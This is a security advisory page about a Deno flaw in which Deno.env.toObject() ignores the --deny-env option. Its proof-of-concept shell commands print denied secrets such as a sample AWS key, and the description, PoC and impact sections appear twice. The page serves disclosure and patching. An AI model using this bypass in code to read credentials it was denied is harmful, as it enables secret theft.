Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
8.1
Deno's Deny-Env Option Ignored by toObject Method
JLSEC-2026-110
Summary
Deno's Deny-Env option is bypassed when using toObject. This means that environment variables listed in Deny-Env can still be accessed using this method. If you're using Deno and rely on the Deny-Env option to restrict access to sensitive environment variables, you should avoid using toObject and instead use the get method to access individual variables. Update your code to use get instead of toObject to maintain the intended security restrictions.
What to do
- Update deno_jll to version 2.6.3+0.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| – | deno_jll | <= 2.6.3+0 | 2.6.3+0 |
Original title
Deno.env.toObject() ignores the variables listed in --deny-env and returns all environment variables
Original description
### Summary
The [Deno.env.toObject](https://docs.deno.com/api/deno/%7E/Deno.Env.toObject) method ignores any variables listed in the `--deny-env` option of the `deno run` command. When looking at the [documentation](https://docs.deno.com/runtime/fundamentals/security/#environment-variables) of the `--deny-env` option this might lead to a false impression that variables listed in the option are impossible to read.
### PoC
```
export AWS_SECRET_ACCESS_KEY=my-secret-aws-key
# Works as expected. The program stops with a "NotCapable" error message
echo 'console.log(Deno.env.get("AWS_SECRET_ACCESS_KEY"));' | deno run \
--allow-env \
--deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -
# All enviroment variables are printed and the --deny-env list is completely disregarded
echo 'console.log(Deno.env.toObject());' | deno run \
--allow-env \
--deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -
```
The first example using `get` exits with the following error:
```
error: Uncaught (in promise) NotCapable: Requires env access to "AWS_SECRET_ACCESS_KEY", run again with the --allow-env flag
console.log(Deno.env.get("AWS_SECRET_ACCESS_KEY"));
^
at Object.getEnv [as get] (ext:deno_os/30_os.js:124:10)
at file:///$deno$stdin.mts:1:22
```
The second example using `toObject` prints all environment variables:
```
[Object: null prototype] {
...
AWS_SECRET_ACCESS_KEY: "my-secret-aws-key",
...
}
```
### Impact
Software relying on the combination of both flags to allow access to most environment variables except a few sensitive ones will be vulnerable to malicious code trying to steal secrets using the Deno.env.toObject() method.
The [Deno.env.toObject](https://docs.deno.com/api/deno/%7E/Deno.Env.toObject) method ignores any variables listed in the `--deny-env` option of the `deno run` command. When looking at the [documentation](https://docs.deno.com/runtime/fundamentals/security/#environment-variables) of the `--deny-env` option this might lead to a false impression that variables listed in the option are impossible to read.
### PoC
```
export AWS_SECRET_ACCESS_KEY=my-secret-aws-key
# Works as expected. The program stops with a "NotCapable" error message
echo 'console.log(Deno.env.get("AWS_SECRET_ACCESS_KEY"));' | deno run \
--allow-env \
--deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -
# All enviroment variables are printed and the --deny-env list is completely disregarded
echo 'console.log(Deno.env.toObject());' | deno run \
--allow-env \
--deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -
```
The first example using `get` exits with the following error:
```
error: Uncaught (in promise) NotCapable: Requires env access to "AWS_SECRET_ACCESS_KEY", run again with the --allow-env flag
console.log(Deno.env.get("AWS_SECRET_ACCESS_KEY"));
^
at Object.getEnv [as get] (ext:deno_os/30_os.js:124:10)
at file:///$deno$stdin.mts:1:22
```
The second example using `toObject` prints all environment variables:
```
[Object: null prototype] {
...
AWS_SECRET_ACCESS_KEY: "my-secret-aws-key",
...
}
```
### Impact
Software relying on the combination of both flags to allow access to most environment variables except a few sensitive ones will be vulnerable to malicious code trying to steal secrets using the Deno.env.toObject() method.
osv CVSS4.0
8.1
- https://docs.deno.com/api/deno/~/Deno.Env.toObject URL
- https://docs.deno.com/runtime/fundamentals/security/#environment-variables URL
- https://github.com/denoland/deno/commit/2959e083912420988066a001c2b2d6732a1b562f URL
- https://github.com/denoland/deno/commit/946ccda1aa19a00c478a5e6826b75053b050d753 URL
- https://github.com/denoland/deno/pull/29079 URL
- https://github.com/denoland/deno/security/advisories/GHSA-7w8p-chxq-2789 URL
- https://nvd.nist.gov/vuln/detail/CVE-2025-48934 URL
- https://github.com/advisories/GHSA-7w8p-chxq-2789 URL
Published: 14 Apr 2026 · Updated: 14 Apr 2026 · First seen: 14 Apr 2026